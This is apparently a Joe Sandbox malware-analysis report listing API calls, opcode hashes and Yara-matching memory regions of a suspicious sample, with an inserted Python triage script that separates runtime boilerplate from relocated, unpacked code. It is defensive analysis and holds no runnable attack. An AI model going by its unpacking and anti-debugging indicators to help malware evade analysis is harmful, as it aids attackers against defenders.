• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
• Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
• Instruction ID: 807a92623273bad5a0fc5b797991b55d28319ce553299938bf2ac813a247c003
• Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
• Instruction Fuzzy Hash: E861FB79604206AAD765AF3DDC46BBB73ADEF04718F24402FE905D7280EB74D540CB65
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free
• String ID:
• API String ID: 2834031935-0
• Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
• Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
• Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
• Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                          • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0249DAD7), ref: 024BA732
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0249DAD7), ref: 024BA73C
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0249DAD7), ref: 024BA749
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                          • Instruction ID: bcd2dae695cca78a1cf2393b09307dd5b9720e163ffa21b8a3c6072774895f94
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F831C67490122C9BCB21DF69D9887DDBBB8BF19710F5041EAE40CA7250E7709B858F54
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                          • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00E7
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00EE
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 024C0100
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                          • Instruction ID: 94596048c1fa0f4895347fcea5cbe06743c4e0f01de4d51cbf750717c5248447
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E04639000148EBCF526F99DD08A493B6AEB02B52F20402DF9048B230CB36EA42DE44
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                          • Instruction ID: 11c3ce01d4b21e2cad106f8ee3e8e99851c685a3892a5c7049a3e18a3c7c256e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 153139B6900609DFDB10CF99C880AAEBBF9FF48328F15514AD841AB310D771EA45CFA4
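The entries above list the same API triplets twice: once in the PE-backed image at 00400000 and once in the non-PE region at 02490000 that carries Yara matches, and in the second case the GetCurrentProcess/TerminateProcess/ExitProcess function even keeps the same Opcode ID. The following triage helper is example code added for this edit (it is not part of the Joe Sandbox report or its IDA plugin) that parses entries in this layout, flags an Opcode ID seen in both a PE-backed and a non-PE region as a relocated copy, and labels API sets that match the MSVC runtime's own fault-reporting and exit helpers as probable compiler boilerplate. The CRT_PATTERNS mapping is an analyst heuristic, an assumption of this example rather than a statement the report makes; the point of the check is that an IsDebuggerPresent reference inside such a function is not by itself evidence of custom anti-debugging, so whatever survives the filter is what deserves a manual look. The SAMPLE string is a constructed excerpt: four entries copied from this report and trimmed to the fields the parser reads.

```python
"""Triage helper for Joe Sandbox per-function "APIs" / "Memory Dump Source" entries.

Example code added for this edit, not part of the Joe Sandbox report or its IDA plugin.
CRT_PATTERNS is an analyst heuristic (an assumption), not something the report states.
"""
import re
from collections import defaultdict

API_RE = re.compile(r"^(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Source File:\s*\S+,\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
FIELD_RE = re.compile(r"^(?:•\s*)?(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")

# Heuristic (assumption): API sets of the MSVC/UCRT runtime's own helpers. A function whose
# imports are exactly one of these sets is most likely compiler boilerplate, not malware logic.
CRT_PATTERNS = {
    frozenset({"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}):
        "CRT fault reporter (security-check / invalid-parameter failure path)",
    frozenset({"GetCurrentProcess", "TerminateProcess", "ExitProcess"}): "CRT process exit path",
}

# Constructed input: four entries copied from this report, trimmed to the fields parsed below.
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0249DAD7), ref: 024BA732
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0249DAD7), ref: 024BA73C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0249DAD7), ref: 024BA749
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Yara matches
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
APIs
• GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
• TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
• ExitProcess.KERNEL32 ref: 0042FE99
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
APIs
• GetCurrentProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00E7
• TerminateProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00EE
• ExitProcess.KERNEL32 ref: 024C0100
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Yara matches
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
"""


def parse_entries(text):
    """Split the pasted listing into one record per function."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):  # either header opens a function entry in this layout
            if cur is None or cur["opcode_id"] is not None:
                cur = {"apis": [], "yara": False, "offset": None, "based_on_pe": None, "opcode_id": None}
                entries.append(cur)
            continue
        if cur is None:
            continue
        if line == "Yara matches":
            cur["yara"] = True
        elif (m := SRC_RE.search(line)):
            cur["offset"], cur["based_on_pe"] = int(m["off"], 16), m["pe"] == "true"
        elif (m := API_RE.match(line)):
            cur["apis"].append((m["api"], m["module"], int(m["ref"], 16)))
        elif (m := FIELD_RE.match(line)) and m["key"].strip() == "Opcode ID":
            cur["opcode_id"] = m["val"].strip()
    return entries


def classify(entries):
    """Attach the two heuristic labels to every record; output keeps input order."""
    regions = defaultdict(set)  # opcode id -> set of based_on_pe values it was seen with
    for e in entries:
        regions[e["opcode_id"]].add(e["based_on_pe"])
    out = []
    for e in entries:
        names = frozenset(a for a, _, _ in e["apis"])
        out.append({
            "opcode_id": e["opcode_id"], "offset": e["offset"], "based_on_pe": e["based_on_pe"],
            "yara": e["yara"], "apis": sorted(names),
            "crt_boilerplate": next((lbl for sig, lbl in CRT_PATTERNS.items() if sig == names), None),
            # same opcode hash in the PE-backed image and in a non-PE region: a relocated/unpacked copy
            "relocated_copy": regions[e["opcode_id"]] == {True, False},
        })
    return out


def suspicious_debugger_checks(results):
    """IsDebuggerPresent callers not explained by CRT boilerplate: the ones left to review by hand."""
    return [r for r in results if "IsDebuggerPresent" in r["apis"] and not r["crt_boilerplate"]]


if __name__ == "__main__":
    for r in classify(parse_entries(SAMPLE)):
        print(f"{r['opcode_id'][:12]} @{r['offset']:08X} pe={r['based_on_pe']} yara={r['yara']} "
              f"crt={r['crt_boilerplate']} relocated={r['relocated_copy']}")
```

Run against the excerpt, all four functions are labelled as CRT helpers, so the review list for IsDebuggerPresent comes back empty, while the exit-path function is flagged as a relocated copy because its Opcode ID occurs both in the image at 00400000 and in the Yara-matching non-PE region at 02490000. Paste further entries from the report into the same format to extend the triage; any IsDebuggerPresent caller whose API set does not match a CRT pattern is the one worth opening in the disassembler.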
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
• Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
• Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
• Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
• Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
Strings
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
• Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                          • Instruction ID: f2770f8a9dcd4ba6199dd1f4cf84a48872e5b76d7781d084af10b5db9c307d3d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2841087A500219AECB219FBDDC48EAB77B9EF84714F60466EF905D7280E7319D41CB50
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                          • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                          • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                          • Instruction ID: 6bc98911374f568c0420925b4315458e0cf8497bb0fef3618f73e48cfaf34742
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0022B71E002199BDF15CFA9C9806EEB7F1EF88314F15866AE919E7380D731A945CF90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0249262C
                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 024927CA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4264772764-0
                                                                                                                                                                                                                                                                          • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                          • Instruction ID: 7fed65e829bdb85d7086353b8c6347e6979f9d2d992ed28c86823371e4499b97
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F412125964344A5E731FFA5BC45B2637B0FF64B26F10252BD528CB2B2E3B28540C75E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                          • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024C6F21,?,?,00000008,?,?,024CF3E2,00000000), ref: 024C7153
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                          • Instruction ID: 14ef7885017bb4ceecc72a04d284f4eca1241b39c27560258c8e6703b9305fb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFB127392106089FD755CF2CC48AB65BBA4FB45368F29865DE89ACF3A1C735D982CF40
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
• Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
• Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
• Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024CB900
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction ID: 80cf140e91eb6a6325efdfb889abfd38af81fc0c9933d2cf9e9882f1444081a0
• Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction Fuzzy Hash: CD21B03A95420AABDF689E2DDC42BBA77ACEB04318F20017FED01D6250EB759944CB50
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
• Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
• Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
• Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
